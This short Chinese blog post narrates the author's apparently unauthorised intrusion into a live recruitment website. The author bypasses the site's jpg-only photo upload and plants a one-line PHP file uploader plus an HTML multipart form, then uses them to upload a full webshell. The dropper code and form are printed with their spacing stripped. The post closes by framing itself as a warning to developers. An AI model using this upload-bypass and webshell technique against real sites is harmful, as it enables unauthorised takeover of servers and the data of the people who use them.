今天空下来在逛人才网.处于习惯问题...所以就走马观花的检测一下.
程序是php的,由于本身对PHP注入也不是很吊.所以也就找了几个点大致上的试了下.似乎也没啥花头.就另寻它处了.
继续来到首页,丫.人才网都可以自己传照片上去吧?.不妨小试一下
反正闲着也是闲着.注册个号看看``呦,你还别说.还真被我猜中
跳过注册过程.注册完登陆进去..上传照片."只能传jpg格式的文件"...
你说只能传jpg我就相信了?我还不傻,所以还是传了个php文件上去.咦..提示文件太大..哈哈..那就是可以传shell.换个小马就行咯.
好..那就OK了...
先传个小马上去
代码
<?phpcopy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
成功了.看到是一个X
看属性.地址为
好咯.下面就把这htm改好ACTION..
<formENCTYPE="multipart/form-data"ACTION=""METHOD="POST">
<inputNAME="MyFile"TYPE="file">
<inputVALUE="提交"TYPE="submit">
</form>
找个大马.提交上去`
成功..可爱的shell就完美的呈现在眼前了......
后话,其实这就一个上传问题没有啥含量.不,应该说是一点都没..只为了能希望这文章能提醒那些人才网程序作者.得注意些小细节.往往你忽略的地方.就是别人下手的地方..
当前位置:
